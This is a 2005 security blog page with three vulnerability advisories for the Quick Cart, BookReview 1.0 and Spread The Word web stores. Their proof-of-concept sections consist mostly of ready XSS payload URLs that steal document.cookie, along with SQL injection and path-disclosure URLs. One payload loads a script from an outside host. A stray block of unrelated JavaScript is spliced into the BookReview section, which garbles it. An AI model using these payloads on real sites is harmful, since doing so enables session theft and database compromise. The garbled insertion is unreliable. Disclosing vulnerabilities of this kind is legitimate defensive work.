Quick Cart Search field cross site scripting and script insercion

Sunday, May 29, 2005
#####################################################
Quick Cart Search field cross site scripting and script insercion
vendor url:http://www.quickcart.com/
advisore:http://lostmon.blogspot.com/2005/05/
quick-cart-search-field-cross-site.html
vendor notify: yes exploit available: yes
Securitytracker:1014076
#####################################################

Quick Cart contains a flaw that allows a remote cross
site scripting attack.This flaw exists because the
application does not validate the 'search' field upon
submission to 'search.cfm' script.This could allow a user
to create a specially crafted URL that would execute
arbitrary code in a user's browser within the trust
relationship between the browser and the server,
leading to a loss of integrity.


############
versions
############

free edition affected:
https://www.quickcart.com/qc_checkout.cfm


but is posible other versions ( standar or others) are afected


################
solution
################

no solution was available at this time

#############
Timeline
#############

discovered: 10 may 2005
vendor notify: 27 may 2005
vendor response: 27 may 2005
disclosure: 29 may 2005

##############
exploit
##############

put in the search box of the store:

//"><script>alert(document.cookie)</script>

or

//"><SCRIPT src="http://www.drorshalev.com/dev/injection/js.js"></script>

and the script is executing , this is a XSS flaw
and a posible script insercion


#################### €nd ###################

Thnx to http://www.drorshalev.com for this script
and for hosting it for this demostration.

thnx to estrella to be my ligth
thnx to all http://www.osvdb.org Team
thnx to all who day after day support me !!!
--
atentamente:
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Data Mangler of: http://www.osvdb.org
--
La curiosidad es lo que hace mover la mente

BookReview 1.0 multiple variable XSS

Wednesday, May 25, 2005
###################################################
BookReview 1.0 multiple variable XSS
vendor url:http://www.readersunite.com
advisore:http://lostmon.blogspot.com/2005/05/
bookreview-10-multiple-variable-xss.html
vendor notify: yes exploit available: yes
OSVDB ID:16871,16872,16873,16874,16875,16876,16877
16878,16879,16880,16881
BID:13783
Securitytracker: 1014058
###################################################

BookReview contains a flaw that allows a remote cross
site scripting attack.This flaw exists because the
application does not validate multiple variables upon
submission to multiple scripts.This could allow a user
to create a specially crafted URL that would execute
arbitrary code in a user's browser within the trust
relationship between the browser and the server,
leading to a loss of integrity.

############
versions:
############

BookReview beta 1.0 vulnerable.

##############
solution
##############

no solutions was available at this time

###########
timeline
###########

discovered: 27 april 2005
vendor notify 17 may 2005 (webform)
disclosure: 26 may 2005

##################
proof of concepts
###################

all files are submited to 'index.php' script by variable 'page' like
index.php?page=[NAME_OF_MODULE]&isbn=[NUMBER_OF_ISBN]
the name of module can be 'add_review' 'add_contents' or others

for example this url:
http://[victim]/index.php?page=add_contents
&isbn=083081423X&chapters=25

is the same of this :

http://[victim]/add_contents.htm?isbn=083081423X&chapters=25

whith this if you think we have two wais for exploiting this situation,
one whith the index.php and other directly by the module.

##################
add_review.htm
#################

http://[victim]/add_review.htm?isbn=0801052319&node=
%3Cscript%3Ealert(document.cookie)%3C/script%3E&review=true

http://[victim]/add_review.htm?isbn=0801052319
%22%3E%3Cscript%3Ealert(document.cookie)%3C/script
%3E&node=Political_Science&review=true

http://[victim]/add_review.htm?isbn=0553278223&node=
"><script>alert(document.cookie)</script>&review=true

http://[victim]/add_review.htm?node=index&isbn=\"><script>alert(document.cookie)</script>

###################
index.php
###################

http://[victim]/index.php?page=add_contents&isbn=083081423X
%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E&chapters=25

http://[victim]/index.php?page=add_contents&isbn=083081423X
&chapters=25%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

NICE ERROR !!


; function tallyup() { var count = 0; var book = 0; var part = 0; var section = 0; var chapter = 0; var appendix = 0; var main_prefix = ""; var section_prefix = ""; for ( i=0; i var persian = '' + value; var roman=""; var ronumdashes=""; var buffer=10-persian.length; while (buffer>0) {persian="0"+persian;buffer--} var units=new Array("","I","II","III","IV","V","VI","VII","VIII","IX"); var tens=new Array("","X","XX","XXX","XL","L","LX","LXX","LXXX","XC"); var hundreds=new Array("","C","CC","CCC","CD","D","DC","DCC","DCCC","CM"); var thousands=new Array("","M","MM","MMM","MV","V","VM","VMM","VMMM","MX"); var billionsdashes=new Array("","=","==","===","==","=","==","===","====","=="); romandashes=billionsdashes[persian.substring(0,1)]; var hundredmillionsdashes=new Array("","=","==","===","==","=","==","===","====","=="); romandashes+=hundredmillionsdashes[persian.substring(1,2)]; var tenmillionsdashes=new Array("","=","==","===","==","=","==","===","====","=="); romandashes+=tenmillionsdashes[persian.substring(2,3)]; var millionsdashes=new Array("","_","__","___","_=","=","=_","=__","=___","_="); romandashes+=millionsdashes[persian.substring(3,4)]; var hundredthousandsdashes=new Array("","_","__","___","__","_","__","___","____","__"); romandashes+=hundredthousandsdashes[persian.substring(4,5)]; var tenthousandsdashes=new Array("","_","__","___","__","_","__","___","____","__"); romandashes+=tenthousandsdashes[persian.substring(5,6)]; var thousandsdashes=new Array("","","",""," _","_","_","_","_"," _"); romandashes+=thousandsdashes[persian.substring(6,7)]; roman=thousands[persian.substring(0,1)]; roman+=hundreds[persian.substring(1,2)]; roman+=tens[persian.substring(2,3)]; roman+=thousands[persian.substring(3,4)]; roman+=hundreds[persian.substring(4,5)]; roman+=tens[persian.substring(5,6)]; roman+=thousands[persian.substring(6,7)]; roman+=hundreds[persian.substring(7,8)]; roman+=tens[persian.substring(8,9)]; roman+=units[persian.substring(9,10)]; return roman; } function alphabetise(number) { return String.fromCharCode(64+number); } /// function submitconfirm() { var agree = document.getElementById('agree'); if ( !agree.checked ) { alert("You must indicate your agreement to the terms and conditions by checking the box provided."); return false; } return true; }


###################
add_contents.htm
###################


http://[victim]/add_contents.htm?isbn=083081423X
%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

http://[victim]/suggest_category.htm?node=Agriculture
%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

http://[victim]/contact.htm?user=admin
%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

http://[victim]/add_booklist.htm?node=Agriculture_and_Aqua
culture%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E


#########################
others.
#########################

http://[victim]/add_url.htm?node=
%3Cscript%3Ealert(document.cookie)%3C/script%3E

http://[victim]/search.htm?page=search&submit%5Bstring
%5D=%5C%22%3E%3Cscript%3Ealert%28document.cookie%29
%3C%2Fscript%3E&submit=Ok&submit%5Btype%5D=author

http://[victim]/add_classification.htm?isbn=0830815961
%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E&node=Gospels

http://[victim]/suggest_review.htm?node=Business_and_Economics
"><script>alert(document.cookie)</script>

############################
posible local fle inclusion
############################

http://[victim]/suggestions/"><
script>alert(document.cookie)</script> .htm

http://[victim]/directory/">%3Cscript%3
Ealert(document.cookie)%3C/script%3E.htm



################
path disclosure:
################

http://[victim]/search.htm?page=search&submit%5Bstring%
5D=&submit=Ok&submit%5Btype%5D=auth
or

http://[victim]/search.htm?page=search&submit%5
Bstring%5D=&submit%5Btype%5D=title

######################## €nd ########################

thnx to estrella to be my ligth
Thnx to icaro he is my Shadow !!!
thnx to all http://www.osvdb.org Team
thnx to all who day after day support me !!!
--
atentamente:
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Data Mangler of: http://www.osvdb.org
--
La curiosidad es lo que hace mover la mente

Spread The Word multiple XSS and SQL injections

Tuesday, May 24, 2005
####################################################
Spread The Word (comersus based bookstore ) multiple
script and variables XSS and SQL Injections vulnerabilities.
vendor url:http://www.stwm.com/opportunity.asp
advisore url:http://lostmon.blogspot.com/2005/05/
spread-word-multiple-xss-and-sql.html
vendor notified:yes exploit available: yes
BID:13733 and 13737
####################################################

Spread The Word (comersus based bookstore ) contains a flaw that
allows a remote cross site scripting attack.This flaw exists because
the application does not validate multiple variables upon submission
to multiple scripts.This could allow a user to create a specially
crafted URL that would execute arbitrary code in a user's browser
within the trust relationship between the browser and the server,
leading to a loss of integrity.


##############
versions:
##############

I can´t established what version are affected.

##############
solution:
##############

no solution was available at this time.

##############
timeline
##############

discovered: 17 oct 2004
vendor notify: 08 april 2005
vendor response: 11 april 2005
disclosure: 24 may 2005



####################
proof of concepts:
####################

Some files have diferent prefix like STW
ej: 'ShowContent.asp' in others stores are 'STWShowContent.asp'

#####################
BrowseCategories.asp
#####################

XSS,sql errors and path disclosure.


http://[target]/store/BrowseCategories.asp?Cat0=783&
Cat0Literal=Gifts&Cat1=839&Cat1Literal=Bible[XSS-here]

http://[target]/store/BrowseCategories.asp?Cat0=783
&Cat0Literal=Gifts&Cat1=839[XSS-here]&Cat1Literal=Bible

http://[target]/store/BrowseCategories.asp?Cat0=783
&Cat0Literal=Gifts[XSS-here]&Cat1=839&Cat1Literal=Bible

http://[target]/store/BrowseCategories.asp?Cat0=783[XSS-here]
&Cat0Literal=Gifts&Cat1=839&Cat1Literal=Bible

http://[target]/store/BrowseCategories.asp?Cat0=783[SQL-INJECTION]
&Cat0Literal=Gifts&Cat1=839&Cat1Literal=Bible

http://[target]/store/BrowseCategories.asp?Cat0=783&Cat0Literal=
Gifts&Cat1=839[SQL-INJECTION]&Cat1Literal=Bible

Cat0literal can be books, videos,gifts,bibles,or other categories similars listed in the cart.

#############
search.asp
#############

XSS,sql errors and path disclosure.

http://[target]/store/Search.asp?SearchType=565
[SQL-INJECTION]&strSearch=lalala

http://[target]/store/Search.asp?InStock=[XSS-here]
&SearchType=783&strSearch=i&SearchCat1=-1&SearchCat2=
-1&PriceMin=&PriceMax=&PublicationDate=-1

http://[target]/store/Search.asp?InStock=&SearchType=
783&strSearch=[XSS-here]&SearchCat1=-1&SearchCat2=
-1&PriceMin=&PriceMax=&PublicationDate=-1

http://[target]/store/Search.asp?InStock=&SearchType=783
&strSearch=lol&SearchCat1=-1[XSS-here]&SearchCat2=-1
&PriceMin=&PriceMax=&PublicationDate=-1

http://[target]/store/Search.asp?InStock=&SearchType=783
&strSearch=lol&SearchCat1=-1&SearchCat2=-1[XSS-here]&
PriceMin=&PriceMax=&PublicationDate=-1

http://[target]/store/Search.asp?InStock=&SearchType=783
&strSearch=lol&SearchCat1=-1&SearchCat2=-1&PriceMin=
[XSS-here]&PriceMax=&PublicationDate=-1

http://[target]/store/Search.asp?InStock=&SearchType=783
&strSearch=lol&SearchCat1=-1&SearchCat2=-1&PriceMin=
&PriceMax=[XSS-here]&PublicationDate=-1

http://[target]/store/Search.asp?InStock=&SearchType=783
&strSearch=1&SearchCat1=-1&SearchCat2=-1&PriceMin=
&PriceMax=&PublicationDate='

##################
AdvancedSearch.asp
##################

http://[target]/store/AdvancedSearch.asp?strSearch=
[XSS-CODE]&SearchType=-1&SearchCat1=-1&SearchCat2=
-1&Author=dd&PublicationDate=-1&PriceMin=1&PriceMax=
111111111&B1=Submit


##################
ViewItem.asp
##################

XSS,sql errors and path disclosure.

http://[target]/store/ViewItem.asp?ISBN=
0789906651[XSS-here]&Cat0=565

http://[target]/store/ViewItem.asp?ISBN=
0789906651&Cat0=565[XSS-here]

http://[target]/store/ViewItem.asp?ISBN=
0789906651[SQL-INJECTION]&Cat0=565

http://[target]/store/ViewItem.asp?ISBN=0789906651
&Cat0=565[SQL-INJECTION]



####################
STWShowContent.asp
###################
XSS ,sql errors and path disclosure.


http://[target]/store/STWShowContent.asp?
idRightPage=13032[XSS-CODE]

http://[target]/store/STWShowContent.asp?
idRightPage=13032[SQL-INJECTION]

http://[target]/store/STWShowContent.asp

###################
MySide.Asp
###################
XSS,sql errors and path disclosure.


http://[target]/store/MySide.Asp?Cat0=565
&Cat0Literal=Bibles[XSS-CODE]

http://[target]/store/MySide.Asp?Cat0=565
[SQL-INJECTION]&Cat0Literal=Bibles

#################
BrowseMain.asp
#################
XSS ,sql errors and path disclosure.

http://[target]/store/BrowseMain.asp?Cat0=565
[XSS-CODE]&Cat0Literal=Bibles&CurHigh=4

http://[target]/store/BrowseMain.asp?Cat0=565
&Cat0Literal=Bibles[XSS-CODE]&CurHigh=4

http://[target]/store/BrowseMain.asp?Cat0=565
[SQL-INJECTION]&Cat0Literal=Bibles&CurHigh=4

http://[target]/store/BrowseMain.asp?Cat0=783
&Cat0Literal=Gifts&CurHigh=3"><
script>alert(document.cookie)</script>

################
others
################
XSS

http://[target]/store/NewCustomer.asp?newemail=
zzzz@lalala.es&RedirectURL=[XSS-CODE]

http://[target]/store/Login.asp?RedirectURL=[XSS-code]

Also it´s posible to we can inject sql or XSS code in 'Cat0' variable
or 'Cat1' in all files where this variables are used.

Also it´s posible to we can inject XSS code in 'Cat0literal' variable
or 'Cat1literal' in all files where this variables are used.

################### End ################

thnx to estrella to be my ligth
Thnx to icaro he is my Shadow !!!
thnx to all http://www.osvdb.org Team
thnx to all who day after day support me !!!
--
atentamente:
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Data Mangler of: http://www.osvdb.org
--
La curiosidad es lo que hace mover la mente

A thought...

Saturday, May 21, 2005
It can that is not so good idea to share what it is known.
The crude reality, unfortunately often surpasses the fiction...

:X
 

Browse

About:Me

My blog:http://lostmon.blogspot.com
Mail:Lostmon@gmail.com
Lostmon Google group
Lostmon@googlegroups.com

La curiosidad es lo que hace
mover la mente...

Friends